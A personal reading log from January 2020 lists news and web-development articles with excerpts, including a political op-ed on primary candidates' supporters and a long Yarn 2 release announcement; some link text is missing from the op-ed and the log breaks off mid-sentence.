James Reads

HomeBlog

Day of Jan 28th, 2020

  • Bernie Bros, Buttigiegers and the Criticism of Candidates

    I fondly remember the days when I was “in the tank” for Bernie Sanders. My time as a shill for Bernie only lasted for a few weeks after I , ” which was followed by the time I “” Joe Biden, which was months after I unfairly distorted . But, of course, everyone knows I’m secretly working for Donald Trump. Sadly, my tenure as a low-class bully and a ended when I recently to Joe Rogan after the ultimate fighting podcaster announced that he’ll “probably vote for Bernie,” a statement which many, including , took as an endorsement. Sanders’ legion of supporters and Rogan acolytes quickly disproved my characterization of them as a vicious bearded horde by flooding my inbox and Twitter mentions, bestowing me with titles from “career activist bum” to an “Uncle Tom” who was shilling for “the white muthafuckas.” (My negro senses tell me both insults were from white people. Everyone knows the correct spelling is “muhfuckas” and should never be preceded by the word “the.”) I’ve been called worse. However, the mostly Caucasian “not-all ____” clapback illustrates a common characteristic shared by Bernie Bros, MayorSapiens and even MAGAmuffins. Namely, that any criticism—no matter how valid or accurate—is an ad hominem attack on their preferred presidential candidate meant to destroy their chances of becoming the leader of the free world. We’ve seen the current commander-in-chief do this too many times. Whenever media outlets or individuals point out Trump’s incessant lies, his unyielding ignorance or his perpetual pettiness, he and his minions immediately dismiss the substance of the argument as a conspiratorial plot by “deep state” snowflakes who want to undermine the president’s authority. When Trump retaliates with vile Twitter attacks, progressives cast it as desperation and malevolence. But, if you dare mention Pete’s record on race, it suddenly becomes a , meritless smear. What about the facts, though? The truth is, that Bernie Sanders often sidesteps institutional racism, instead, casting racial disparities as consequences of capitalism and corporate greed. There are instances, including a recent interview with the New York Times editorial board, when it seems as if Sanders is unable to say the words “white supremacy” or “racism.” Sanders’ supporters will insist that economics and systemic racism are inextricably intertwined, a reality that I have reported on extensively. However, Sanders seems all-too-willing to address issues of class, corporatism and economic inequality without asking white America to take responsibility for the “white” part of white supremacy. The problem with this is manifold—the biggest one being that racial disparities can’t be addressed as an economic issue without specifically focusing on race. actually have a higher crime rate and   more often than . But blacks are and receive 20 percent longer prison sentences than whites who commit the same crimes, according to the . Poor white schools receive , on average than even middle-class, majority-black schools. These aren’t class problems. These are race problems. Policies that address them as issues of simple economics means that Sanders’ progressive policies could lift poor white people out of poverty while still leaving black people behind. Pete Buttigieg’s to address these racial disparities is ambitious and real. However, it is also real that he ignored actual . It is also real that South Bend, Ind., spent of the city’s contracts budget with black-owned businesses from 2015-2017. It is also true that there are multiple instances of him disregarding racism to parrot when he gets in front of white people. Pete Buttigieg has said all the right things about race since he became a presidential candidate, but highlighting his racial blindspot and the mistakes he made during his mayoral tenure is not an “attack.” Even if his candidates believe he has seen the light or has made positive changes, there are many people who believe that the shit he actually did as mayor is not only important but more relevant to voters than his negro p rogressive Negro PowerPoint presentation. Despite having a large constituency of black voters, no one is “hating” on Joe Biden when they point out his ; or the part of his legislative past; or that he said that he’d consider a ; or his promise to continue the primary tool in a racist ; or the fact that he’s a moderate, old white man who keeps acting like a moderate, old white man. Eliza beth Warren used to be a Republican and knows like… (Harriet Tubman, Barack Obama and Cardi B). Plus, Warren says she . With the buildup over all those years, how can anyone trust that she’s not-two-faced? Amy Klobuchar was a who cops accused of police brutality. Forgive me for stating actual facts. There is no perfect candidate. However, black voters have the right to know the truth and—when it comes to issues of race—they should be able to weigh the pros and the cons. While these candidates’ cons might not necessarily be fatal, it is stupid to dismiss valid criticism as unwarranted attacks. It makes your candidate look weak. Whether it is policy, character defects or repeated blunders, pointing out these blemishes doesn’t mean the candidate is unworthy of the presidency. Pointing out a politician’s blemishes isn’t a call for that particular contender to be canceled, nor is it necessarily an act of advocacy for a different candidate. It’s facts. And none of this helps Donald Trump. Ultimately, most black people are going to vote for whoever emerges as the Democratic nominee. If black voter turnout declines in the 2020 election, it will be because white voters chose a nominee who couldn’t, or didn’t care to motivate black voters. On the other hand, many of the most vocal white supporters who are rankled by actual facts, will turn around and vote for Trump if their candidate does not emerge victorious at the conclusion of the primary season. Yep, we already know that—no matter who the Democrats select—white people are gonna still vote for Donald Trump. The Republican candidate for president has won the white vote in every election in the last 40 years. Even when it comes to white Democrats, of Hillary Clinton’s supporters ended up voting for McCain over Obama in 2008. Twelve percent of Bernie’s backers voted for Trump in the 2016 presidential election, according to separate . So, when anyone points out Bernie Sanders’ allergy to the word racism or when someone mentions Buttigieg’s racial blind spot, instead of considering it an “attack,” their supporters should either admit that their candidate is flawed or—at the very least—concede that they don’t care about white supremacy as long as they can get Medicare for A ll. And when Bernie Bros object to being characterized as a bearded, belligerent hoard, they should wonder how they gained that reputation. But they should still feel free to call me an Uncle Tom centrist hater who’s a shill for (insert the opposing candidate’s name here) because I’m used to it. I’ve heard worse things from better white people (the phrase “President Donald Trump,” for instance). Wypipo are forever and always gonna wypipo. Trust me. Even the thundering herd of bearded Bernie Bros in my inbox readily acknowledge that I have unequaled expertise in one specific area: White muhfuckas. Source: Bernie Bros, Buttigiegers and the Criticism of Candidates

    Read at 06:08 pm, Jan 28th

  • Does CSS affect screen readers

    The short and rather vague answer is that screen readers are affected by certain CSS properties. Different screen readers behave differently, and a screen reader might even have several methods of presentation that the user can choose from that alter the effects of CSS.

    Read at 02:45 pm, Jan 28th

  • What went wrong for the municipalists in Spain?

    On May 26, citizens across Spain went to the polls to vote in municipal and European elections. The results were widely seen as a setback to the municipalist wave that swept Spain’s major cities four years prior.

    Read at 02:44 pm, Jan 28th

  • Developers Had City's Ear In Rezoning While Inwood Residents Were Shut Out, Emails Reveal

    Gothamist is a non-profit, member-supported local news site. We're thriving and growing because our readers step to support our local reporting. Support Gothamist with your year-end donation today and keep local news strong in New York City.

    Read at 01:31 pm, Jan 28th

  • Min and Max Width/Height in CSS

    Oftentimes, we want to limit the width of an element relative to its parent, and at the same time, to make it dynamic. So having a base width or height with the ability to make it extend based on the available space.

    Read at 01:28 pm, Jan 28th

  • Lawmakers want city-controlled transit in wake of Byford’s exit

    Some lawmakers are calling for a city takeover of the state-run MTA’s subway and bus services in the wake of popular transit chief Andy Byford’s resignation Thursday.

    Read at 01:19 pm, Jan 28th

  • NY lawmakers propose real estate tax on investors to boost public housing funds

    ALBANY ― New York lawmakers want to close a legal loophole that allows deep-pocketed real estate investors to avoid paying taxes. Sen.

    Read at 01:18 pm, Jan 28th

  • New York City Stores Must Accept Cash, Council Says

    New York lawmakers passed a bill that puts New York at the forefront of a national movement to ban cashless businesses. From a cup of coffee to a car ride, mobile devices or plastic cards are becoming the preferred, and sometimes exclusive, methods of payment in many parts of the world.

    Read at 01:16 pm, Jan 28th

  • Bernie Can’t Win

    “Left but not woke” is the Bernie Sanders brand. If anybody failed to recognize it before, nobody can miss it now. Last week, the mega-podcaster Joe Rogan endorsed Sanders. The Sanders campaign tweeted a video of the Rogan endorsement from Sanders’s own account.

    Read at 01:09 pm, Jan 28th

  • Cuomo’s Recipe to Plug $6B Budget Hole: Everyone Shares Medicaid Pain

    Sign up for “THE CITY Scoop,” our daily newsletter where we send you stories like this first thing in the morning. Gov. Andrew Cuomo on Tuesday proposed a $178.6 billion state budget for the upcoming fiscal year that seeks to close a $6.

    Read at 12:52 pm, Jan 28th

  • John Roberts Can Call Witnesses to Trump’s Trial. Will He?

    Democratic House managers should ask the chief justice to issue subpoenas for John Bolton and others. Mr. Katyal and Mr. Geltzer are law professors at Georgetown. Mr. Edwards is a former Republican congressman from Oklahoma.

    Read at 12:48 pm, Jan 28th

  • 'They let him get away with murder': Dems tormented over how to stop Bernie

    With Bernie Sanders gaining steam a week before the Iowa caucuses, tormented Democrats are second-guessing what they say was a hands-off strategy against the Vermont senator in the 2020 primary.

    Read at 06:05 am, Jan 28th

Day of Jan 27th, 2020

  • https://revolutionsperminute.simplecast.com/episodes/socialist-city-council-white-house-w-jabari-brisport-CbH_QMAp

    Read at 07:16 pm, Jan 27th

  • 5 Things I Love About My Website Built with Next.js ― Scotch.io

    This site is home to certain tech and web dev goodies that make me very happy. This post is about what they are, and how they work. While most websites these days come with some type of dark/light mode toggle switch, I serve you content based on the setting that you've set on your system: if you use your phone/computer in dark mode, you get dark mode. If you use it in light mode, you get light mode. This is made possible by the powerful prefers-color-scheme media query in CSS. Here's a code sample that makes that possible. This website is built with React and ZEIT's popular framework Next.js, which honestly is such a dream to work with. 😍 Next.js' opinionated-ness as a framework takes a lot of the mental overhead of structuring things away from me and, in many ways, "just works". What's even better, is it's all magically ✨ server-rendered out-of-the-box, without extra work from me so search engines can pick it up and people can find it! Server Rendering What is server rendering? It's when a site is "rendered" (think, drawn) on the server and then delivered to a browser. This way, you get the content immediately from a server. This is a bit different than how many websites work on the web today. If you've ever opened up a website and seen spinners immediately before your content, it's quite likely that it was not server rendered: it was "drawn" (or rendered) in your browser (AKA the client, AKA not a server). The benefit of server-rendering for me is: Essential Reading: Learn React from Scratch! (2020 Edition) You get your content immediately, instead of spinners Search engines can read it easier No jumpy and possibly unpredictable behavior: if you load a non-server-rendered-spinner-driven website on a train, or somewhere with intermittent internet, the user experience could end up in some strange, unpredictable state. This risk doesn't quite exist with server rendering. Next.js gives me all of this for free, without having to do anything. Deployment IT GETS BETTER! Using another product from ZEIT called now, I'm able to upload this site to the internet magically by running one command. And just like that, tejaskumar.com is up-to-date with the latest blog post and can scale infinitely and handle billions of readers at any given time. What a time to be alive. 😍 I've tried to keep this website playful and whimsical, with the silly photos of me and odd nicknames. I feel like we can all sometimes get too serious. I'd like my little corner of the internet to be fun and not so langweilig. Real Mac Dock My Dock I even created a mouseover effect to mimic the macOS dock in CSS just for fun because why not. Let's make it playful and fun. If you have ideas for ways we can continue to boost the whimsy of this website, let me know on twitter and it could be a cool collaboration between us! 😄 Working on a <ConfettiGeyser> component for my React Europe Whimsy Workshop :D this one'll be a ton of fun to build. pic.twitter.com/JlTMUWaxad — 🌈 Josh (@JoshWComeau) May 9, 2019 I really appreciate Josh Comeau and the things he creates because they're creative and beautiful. It's this kind of flair/vibe that I appreciate on the web. I've had a number of conversations that go like this: I'm starting a blog. What stack should I choose? What should my backend be? 🤔 I've had this conversation with myself often. As with most things, I'd like to employ the KISS (Keep It Simple and Spectacular) principle. I'm a huge fan of the JAMStack: the JavaScript, APIs, Markup stack. That's entirely how this site works: There are a number of different backends I could use. I could even go "backendless" and have everything be statically generated using Gatsby or similar. Why do I choose a GitHub backend? I'm glad you asked. The source code lives on GitHub. Like... it's there. A database is essentially a folder containing files and things in a certain structure. There's no real reason my blog folder couldn't be a database. It seems like the simplest solution. There are limitations, but they don't matter much to me. Static build time. This blog has 3 posts on it at the time of writing. 3. Three. T h r e e. Drei. That's not a lot. But, when building something, I think of scenarios where it could have 3,000,000. <blockquote class="twitter-tweet"><p lang="en" dir="ltr">Curious: what are y'all's thoughts on using a static site generator (maybe like <a href="https://twitter.com/gatsbyjs?ref_src=twsrc%5Etfw">@gatsbyjs</a>?) at scale? <br><br>Say for example I have a project with 150k-200k articles. <br><br>What are your thoughts, concerns, etc. about this in terms of build time and deployment?</p>— Tejas Kumar (@TejasKumar_) <a href="https://twitter.com/TejasKumar_/status/1128028814829936645?ref_src=twsrc%5Etfw">May 13, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> In this case, a static site _could theoretically_ take a [looooooong time](https://twitter.com/monicalent/status/1128030476780937217) to build, which could be problematic. **This is the reason I have not chosen a static site generator.** I love client/server because it scales better and allows more clearly defined, non-blocking boundaries between components. Enforced transferrable writing. Realistically, GitHub has a rate limit. I think it caps out at 5K requests per hour (please don't DDoS me). At some point, I might have to move my blog post writings out of this GitHub repository and somewhere else. How hard will this migration be? Copy. Paste. It's _all text_. Literally, it's [_all markdown_](https://github.com/TejasQ/tejaskumar.com/blob/master/blog/1579543554591__5-things-i-love-about-my-website.md). The images are externally hosted and can be polyfilled, but besides that, it's text. I can copy these files to any other backend that supports, well, _text_, and nobody will be able to tell anything changed. Having GitHub as my API enforces me writing this way (transferably) and I love it! In case I outgrow the GitHub backend, I'd consider [Fauna](https://fauna.com/) or similar as a DB. It supports text. Did Tejas build this site? Kind of. Tejas built this with these wonderful people. It's a team effort! This website is community driven. 📣 I have some stuff I want to add to my website. I would like to help underrep’d people in tech and/or newcomers. Let’s build these together! 🙌🏾 1) 🍔 Burger menu for mobile 2) 🎙 Talks section 👨🏾‍💻 If you want to learn to code, please reach out. I want to help you succeed. — TeJAMStack (@TejasKumar_) January 16, 2020 I also have a list of developers I plan to collaborate with in the near future. This list is composed of people with varying backgrounds (beginners through experts) and usually from underrepresented groups in tech. It's an honor and a privilege to use my little corner of the web as a platform to help others in the tech industry as it grows increasingly beautiful each day. Ah, writing all this reminds me how much I have to be thankful for. brb Like this article? Follow @TejasKumar_ on Twitter Source: 5 Things I Love About My Website Built with Next.js ― Scotch.io

    Read at 06:49 pm, Jan 27th

  • James Meneghello

    Hello! What's your background and what do you do? I’m currently the Engineering Manager at InterExchange, a non-profit for cultural exchange.

    Read at 03:48 pm, Jan 27th

  • What a Socialist Approach to Gun Violence Should Look Like

    We’re thankfully beginning to see mass organizing and protest against the epidemic of gun violence in the United States.

    Read at 02:53 pm, Jan 27th

  • Adding special values to types in TypeScript

    One way of understanding types is as sets of values. Sometimes there are two levels of values: In this blog post, we examine how we can add special values to base-level types.

    Read at 02:30 pm, Jan 27th

  • TypeScript enums: How do they work? What can they be used for?

    JavaScript has one type with a finite amount of values: boolean, which has the values true and false and no other values. With enums, TypeScript lets you define similar types statically yourself. The entries No and Yes are called the members of the enum NoYes.

    Read at 02:27 pm, Jan 27th

  • The Billionaires Are Getting Nervous

    Bill Gates and others warn that higher taxes would lead to lower growth. They have their facts backward. The editorial board is a group of opinion journalists whose views are informed by expertise, research, debate and certain longstanding values. It is separate from the newsroom.

    Read at 01:44 am, Jan 27th

  • Choosing the best folder structure for your React application

    As we all probably already know, unlike Angular, where we already have a predefined way of structuring files, in React, that burden, or gift, depending on how you look at it — is bestowed upon us, the valiant developers. Now, I choose to look at this as a gift. And let me explain why.

    Read at 01:31 am, Jan 27th

Day of Jan 26th, 2020

  • 10up Releases Autoshare for Twitter WordPress Plugin – WordPress Tavern

    On Tuesday, 10up released its Autoshare for Twitter plugin. The plugin is designed to automatically tweet blog posts as they are published. By default, it will send the post title, featured image, and link to Twitter. Users can also add a custom message. The plugin is available in the WordPress plugin directory. If you threw a rock into a crowd of WordPress plugins, you would likely smack a social-networking extension. The WordPress plugin market is crowded with similar plugins, so it would make sense if this one flew under the radar. Plus, powerhouse plugins like Jetpack provide similar functionality, such as the Jetpack Publicize feature. Yet, with the prevalence of similar plugins, Autoshare for Twitter is worth checking out. Many similar plugins work with multiple social networks, but 10up’s plugin is designed specifically for sharing via Twitter. For users who only need a solution for that specific social network, it is a solid solution for version 1.0. 10up originally built the plugin to provide the company’s clients more control and customization than they found in existing solutions. “Recognizing its widespread potential, we decided to follow our own best practices for managing open-source software by releasing it as a free plugin on the official WordPress plugin repository,” wrote Jeff Paul, Associate Director of Open Source Initiatives at 10up. The plugin works with both the block and classic editors. When in use with the block editor, it is added as part of the pre-publish check system as shown in the following screenshot: Pre-publish check for tweeting a post. The custom message box tracks the number of characters so that users do not go over Twitter’s character count. The plugin also displays a message in the Status & Visibility panel to let users know if a post was shared on Twitter. Overall, the plugin does its job well (sorry to folks who were bombarded with some test tweets earlier). It would be nice to see similar one-off solutions that are specific to other social networks. I often find myself in need of such plugins without dealing with a full array of social networking options. The plugin is also available on GitHub for others to contribute. Currently, there are several open issues that would improve how the plugin works. Setup Is Not User-Friendly Settings page for Twitter credentials. The biggest downside to the plugin is there are no links, no admin help tab, and no instructions on how to set up the Twitter Credentials on the plugin’s setting screen. The page simply has some text fields for things like an API Key, API Secret, and so on. These are not user-friendly terms, and will likely be confusing for many. Not to mention, similar plugins can connect users at the click of a button. For a plugin that does nearly everything else right, this is a missing piece of what would be a near-perfect release. The plugin is ideal for power users or developers who want to set up Twitter sharing for a client. In the current version of the plugin, users need to set up a Twitter Developer account and create a Twitter App. This generates the API keys and necessary tokens for using the plugin. The plugin does have an open ticket on GitHub for a better onboarding process, which could solve this issue. Therefore, the team is aware of and actively working on making this smoother in a future version. Like this: Like Loading... Source: 10up Releases Autoshare for Twitter WordPress Plugin – WordPress Tavern

    Read at 03:43 pm, Jan 26th

  • Introducing Storybook Design System

    Storybook is the most popular component explorer on the planet. It’s used by 20,000+ GitHub projects and maintained by over 700 contributors. As the team and project scale new UI challenges are unearthed. More developers means higher communication overhead.

    Read at 03:25 pm, Jan 26th

  • Memory Leaks Demystified

    Tracking down memory leaks in Node.js has been a recurring topic, people are always interested in learning more about due to the complexity and the range of causes.

    Read at 03:20 pm, Jan 26th

  • JavaScript tree shaking, like a pro - Daniel Brain - Medium

    Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data. Source: JavaScript tree shaking, like a pro – Daniel Brain – Medium

    Read at 03:17 pm, Jan 26th

  • Monitoring Node.js: Watch Your Event Loop Lag!

    If you ask any Node.js developer for their number one performance tip, chances are close to a hundred percent that they will give you the following advice: Avoid synchronous work. Why is synchronous work bad? Because in Node.js, there is only a single thread.

    Read at 02:21 pm, Jan 26th

  • An Ecosocialist Green New Deal: Guiding Principles

    Humankind has reached a moment of existential crisis. Human activity is causing disastrous climate disruption and Earth’s sixth mass extinction event, triggering critical losses of biodiversity.

    Read at 04:37 am, Jan 26th

  • Gutenberg 7.2 Adds Long-Awaited Multi-Button Block and Gallery Image Size Option

    The Gutenberg team released version 7.2 of the plugin yesterday after a four-week release hiatus for the holidays. This update includes at least 180 pull requests to the project’s repository by 56 contributors.

    Read at 04:02 am, Jan 26th

  • Olav Stetter

    Hello! What's your background and what do you do? Hi! My name is Olav, and I’m the Head of Data Science at KONUX, an IoT/AI startup based in Munich, that enables intelligent infrastructure for the rail industry.

    Read at 12:17 am, Jan 26th

  • How the Health Insurance Industry (and I) Invented the ‘Choice’ Talking Point

    It was always misleading. Now Democrats are repeating it. Mr. Potter is a former insurance executive.

    Read at 12:07 am, Jan 26th

Day of Jan 25th, 2020

  • Can the Block Directory and Business Interests Coexist?

    WordPress.org is not an official marketplace for plugins and themes. Except for some plugins that are strictly SaaS products, all extensions to the platform are publicly available for the low cost of $0. Despite not directly selling through WordPress.

    Read at 11:55 pm, Jan 25th

  • Redux is half of a pattern (1/2)

    Redux is fantastic. Some of you might disagree, so let me tell you why.

    Read at 11:43 pm, Jan 25th

  • Building LightOS with React Native

    The Light Phone 2 is a minimalist cellphone that was named one of Time Magazine’s best inventions of 2019. In early 2018, we joined Light to build the operating system and supporting software stack, namely the “LightOS”. Light is a radically different technology company.

    Read at 04:30 pm, Jan 25th

  • The Sanders Campaign Researched Whether Warren Could Be Both Vice President and Treasury Secretary at Once

    The presidential campaign of Sen. Bernie Sanders has researched the question of whether the same person can serve as both vice president and treasury secretary, according to three sources on the campaign. The person the Sanders campaign had in mind with the inquiry was Sen.

    Read at 05:07 am, Jan 25th

  • The Deal with the Section Element

    Two articles published the exact same day: Bruce Lawson on Smashing Magazine: Why You Should Choose HTML5 Over Adam Laki on Pine: The Difference Between

    Read at 05:02 am, Jan 25th

  • The Difference Between <section> and <div> Element

    The <div> is one of the most generic elements in HTML, but is it okay to use it always? Well, it depends on our needs because nowadays we have more items with meaning.

    Read at 05:01 am, Jan 25th

  • The Third Rail of Calling ‘Sexism’

    For a year on the presidential campaign trail, Elizabeth Warren has tried very hard to not have the kind of conversation about sexism that can be messy for candidates, but this week, in a fight with her ideologically closest Democratic competitor, those efforts exploded in her face.

    Read at 04:59 am, Jan 25th

  • Should you get the Node.js Certification?

    A few months ago, the Node.js Certification by the Open.js Foundation was announced. This was big news for the community and the Node.js ecosystem! The launch of the certification prompted a lot of responses and reactions.

    Read at 04:43 am, Jan 25th

  • Blogged Answers

    Both of these assumptions are incorrect, and I want to clarify how they actually work so that you can avoid mis-using them in the future.

    Read at 04:40 am, Jan 25th

  • Frozen In Time

    It was June 1974. The Cold War was verging on détente, though the Watergate scandal overshadowed the Moscow Summit between President Richard Nixon and his Soviet Union counterpart, Leonid Brezhnev.

    Read at 04:37 am, Jan 25th

  • One Year in Washington

    This article was featured in One Great Story, New York’s reading recommendation newsletter. Sign up here to get it nightly.

    Read at 03:55 am, Jan 25th

Day of Jan 24th, 2020

  • Dual Power Then and Now: From the Iroquois to Cooperation Jackson

    Long before the concept of dual power was used by Lenin to refer to the power of the workers’ councils vis-à-vis the state in the Russian revolution, and before Bookchin identified its potential as “as a blueprint for the revolutionary transformation of society,” practices that are now common

    Read at 11:50 pm, Jan 24th

  • Min and Max Width/Height in CSS | CSS-Tricks

    Direct Link → Here's a nice deep dive into min-width / min-height / max-width / max-height from Ahmad Shadeed. I like how Ahmad applies the properties to real-world design situations in addition to explaining how it works. In the very first demo, for example, he shows a button where min-width is used as a method for (trying to) make sure a button has space on its sides. It works if the text is short enough, and fails when the text is longer. That's the kind of "CSS thinking" that is fundamental to this trade. Source: Min and Max Width/Height in CSS | CSS-Tricks

    Read at 10:01 pm, Jan 24th

  • Introducing Yarn 2 ! 🧶🌟 - DEV Community 👩‍💻👨‍💻

    Hi everyone! After exactly 365 days of very intensive development, I'm extremely happy to unveil the first stable release of Yarn 2. In this post I will explain what this release will mean for our community. Buckle up! If you're interested to know more about what will happen to Yarn 1, keep reading as we detail our plans later down this post: Future Plans. If you just want to start right now with Yarn 2, check out the Getting Started or Migration guides. Release Overview Describing this release is particularly difficult - it contains core, fundamental changes, shipped together with new features born from our own usage. Highlights But also... Breaking changes... Those highlights are only a subset of all the changes and improvements; a more detailed changelog can be found here, and the upgrade instructions are available here. Frequently Asked Questions Who should we thank for this release? A significant amount of work has been done by larixer from SysGears, who crawled deep into the engine with the mission to make the transition to Yarn 2 as easy as possible. In particular he wrote the whole node_modules compatibility layer, which I can tell you is no easy feat! My thanks also go to everyone who spontaneously joined us for a week or a month during the development. In particular embraser01 for the initial Windows support, bgotink for typing our filesystem API, deini for his contributions to the CLI, and Daniel for his help on the infrastructure migration. This work couldn't have been possible without the support from many people from the open-source community - I think in particular to Nicolò from Babel and Jordan from Browserify, but they're far from being the only ones: the teams of Gatsby, Next, Vue, Webpack, Parcel, Husky, ... your support truly made all the difference in the world. And finally, the project lead and design architect for Yarn 2 has been yours truly, Maël Nison. My time was sponsored in large part by Datadog, which is a super dope place to develop JS (which is hiring 😜), and by my fiancé and our cats. Never forget that behind all open-source projects are maintainers and their families. How easy will it be to migrate to Yarn 2? Thanks to our beta testers and the general support of the ecosystem we've been able to soften a lot the pain associated with such a major upgrade. A Migration Guide is available that goes into more detail, but generally speaking as long as you use the latest versions of your tools (ESLint, Babel, TypeScript, Gatsby, etc), things should be fine. One particular caveat however: Flow and React-Native cannot be used at the moment under Plug’n’Play (PnP) environments. We're looking forward to working with their respective teams to figure out how to make our technologies compatible. In the meantime you can choose to remain on Yarn 1 for as long as you need, or to use the node_modules plugin, which aims to provide a graceful degradation path for smoother upgrade (note that it's still a work in progress - expect dragons). More details here. If you don't want to upgrade all of your projects, just run yarn policies set-version ^1 in the repositories that need to stay on Yarn 1, and commit the result. Yarn will always prefer the checked-in binaries over the global ones, making it the best way to ensure that everyone in your team shares the exact same release! What will happen to the legacy codebase? Yarn 1.22 will be released next week. Once done, the 1.x branch will officially enter maintenance mode - meaning that it won't receive further releases from me except when absolutely required to patch vulnerabilities. New features will be developed exclusively against Yarn 2. In practical terms: The legacy repository (yarnpkg/yarn) will move over to yarnpkg/legacy to reflect its maintenance status. It will be kept open for the time being, but we'll likely archive it in a year or two. The modern repository will not be renamed into yarnpkg/yarn, as that would break a significant amount of backlink history. It will remain yarnpkg/berry for the foreseeable future. The old website will move over to legacy.yarnpkg.com, and the new website (currently next.yarnpkg.com) will be migrated to the main domain name. The yarn package on npm will be updated as such: The berry tag will always point towards the latest 2.x release. The legacy tag will always point towards the latest 1.x release. The latest tag will be an alias for legacy for a few weeks, then will switch to berry. This dance is required to give everyone the time to pin their Yarn versions in case their applications aren't compatible with Yarn 2. The Node Docker image will likely start shipping Yarn 2 starting from Node 14, expected in April 2020. Until then you can safely use yarnPath to seamlessly use Yarn 2 on all Node images with little changes to your configuration. We're moving to a fully automated GitHub Actions workflow and some OS registries (in particular Homebrew, Chocolatey, etc) haven't been implemented yet. As a result they might receive the Yarn 2 update later than the others. In the meantime, yarn set version (or yarn policies set-version on Yarn 1) is the recommended way to handle upgrades. We expect most of those changes to be completed by February 1, 2020. In Depth CLI Output Back when Yarn was released its CLI output was a good step forward compared to other solutions (plus it had emojis! 🧶), but some issues remained. In particular lots of messages were rather cryptic, and the colours were fighting against the content rather than working with it. Strong from this experience, we decided to try something different for Yarn 2: Almost all messages now have their own error codes that can be searched within our documentation. Here you'll find comprehensive explanations of the in-and-outs of each message - including suggested fixes. The colours are now used to support the important parts of each message, usually the package names and versions, rather than on a per-line basis. We expect some adjustments to be made during the following months (in particular with regard to colour blindness accessibility), but over time I think you'll come to love this new display! Workspace-aware CLI Working with workspaces can sometimes be overwhelming. You need to keep the state of your whole project in mind when adding a new dependency to one of your workspaces. "Which version should I use? What’s already used by my other workspaces?", etc. Yarn now facilitates the maintenance of such setups through various means: yarn up &lt;name&gt; will upgrade a package in all workspaces at once yarn add -i &lt;name&gt; will offer to reuse the same version as the ones used by your other workspaces (and some other choices) The version plugin will give you a way to check that all the relevant workspaces are bumped when one of them is released again. Those changes highlight the new experience that we want to bring to Yarn: the tool becomes an ally rather than a burden. Zero-Installs While not a feature in itself, the term "Zero Install" encompasses a lot of Yarn features tailored around one specific goal - to make your projects as stable and fast as possible by removing the main source of entropy from the equation: Yarn itself. To make it short, because Yarn now reads the vendor files directly from the cache, if the cache becomes part of your repository then you never need to run yarn install again. It has a repository size impact, of course, but on par with the offline mirror feature from Yarn 1 - very reasonable. For more details (such as "why is it different from checking in the node_modules directory"), refer to this documentation page. New Command: yarn dlx Yarn 2 introduces a new command called yarn dlx (dlx stands for download and execute) which basically does the same thing as npx in a slightly less dangerous way. Since npx is meant to be used for both local and remote scripts, there is a decent risk that a typo could open the door to an attacker: $ npx serv # Oops, should have been "serve" This isn't a problem with dlx, which exclusively downloads and executes remote scripts - never local ones. Local scripts are always runnable through yarn run or directly by their name: $ yarn dlx terser my-file.js $ yarn run serve $ yarn serve New Command: yarn workspaces foreach Running a command over multiple repositories is a relatively common use case, and until now you needed an external tool in order to do it. This isn't the case anymore as the workspace-tools plugin extends Yarn, allowing you to do just that: $ yarn workspaces foreach run build The command also supports options to control the execution which allow you to tell Yarn to follow dependencies, to execute the commands in parallel, to skip workspaces, and more. Check out the full list of options here. New Protocol: patch: Yarn 2 features a new protocol called patch:. This protocol can be used whenever you need to apply changes to a specific package in your dependency tree. Its format is similar to the following: Together with the resolutions field, you can even patch a package located deep within your dependency tree. And since the patch: protocol is just another data source, it benefits from the same mechanisms as all other protocols - including caching and checksums! New Protocol: portal: Yarn 2 features a new protocol called portal:. You can see portal: as a package counterpart of the existing link: protocol. Where the link: protocol is used to tell Yarn to create a symlink to any folder on your local disk, the portal: protocol is used to create a symlink to any package folder. So what's the difference you say? Simple: portals follow transitive dependencies, whereas links don't. Even better, portals properly follow peer dependencies, regardless of the location of the symlinked package. Workspace Releases Working with workspaces brings its own bag of problems, and scalable releases may be one of the largest one. Most of large open-source projects around here use Lerna or a similar tool in order to automatically keep track of changes applied to the workspaces. When we started releasing the beta builds for Yarn 2, we quickly noticed we would be hitting the same walls. We looked around, but existing solutions seemed to have significant requirements - for example, using Lerna you would have to either release all your packages every time, or to keep track yourself of which packages need to be released. Some of that work can be automated, but it becomes even more complex when you consider that a workspace being released may require unrelated packages to be released again too (for example because they use it in their prepack steps)! To solve this problem, we've designed a whole new workflow available through a plugin called version. This workflow, documented here, allows you to delegate part of the release responsibility to your contributors. And to make things even better, it also ships with a visual interface that makes managing releases a walk in the park! This workflow is sill experimental, but it works well enough for us that we think it'll quickly prove an indispensable part of your toolkit when building large projects using workspaces. Workspace Constraints Workspaces quickly proved themselves being one of our most valuable features. Countless projects and applications switched to them during the years. Still, they are not flawless. In particular, it takes a lot of care to keep the workspace dependencies synchronized. Yarn 2 ships with a new concept called Constraints. Constraints offer a way to specify generic rules (using Prolog, a declarative programming language) that must be met in all of your workspaces for the validation to pass. For example, the following will prevent your workspaces from ever depending on underscore - and will be autofixable! gen_enforced_dependency(WorkspaceCwd, 'underscore', null, DependencyType) :- workspace_has_dependency(WorkspaceCwd, 'underscore', _, DependencyType). This other constraint will require that all your workspaces properly describe the repository field in their manifests: gen_enforced_field(WorkspaceCwd, 'repository.type', 'git') :- workspace(WorkspacedCwd). gen_enforced_field(WorkspaceCwd, 'repository.url', 'ssh://git@github.com/yarnpkg/berry.git') :- workspace(WorkspacedCwd). Constraints are definitely one of our most advanced and powerful features, so don't fret yourself if you need time to wrap your head around it. We'll follow up with blog posts to explore them into details - watch this space! Build Dependency Tracking A recurrent problem in Yarn 1, native packages used to be rebuilt much more than they should have. For example, running yarn remove used to completely rebuild all packages in your dependency tree. Starting from Yarn 2 we now keep track of the individual dependency trees for each package that lists postinstall scripts, and only run them when those dependency trees changed in some way: ➤ YN0000: ┌ Link step ➤ YN0007: │ sharp@npm:0.23.0 must be rebuilt because its dependency tree changed ➤ YN0000: └ Completed in 16.92s ➤ YN0000: Done with warnings in 21.07s Per-Package Build Configuration Yarn 2 now allows you to specify whether a build script should run or not on a per-package basis. At the moment the default is to run everything, so by default you can choose to disable the build for a specific package: If you instead prefer to disable everything by default, just toggle off enableScripts in your settings then explicitly enable the built flag in dependenciesMeta. Normalized Shell Back when Yarn 2 was still young, the very first external PR we received was about Windows support. As it turns out Windows users are fairly numerous, and compatibility is important to them. In particular they often face problems with the scripts field which is typically only tested on Bash. Yarn 2 ships with a rudimentary 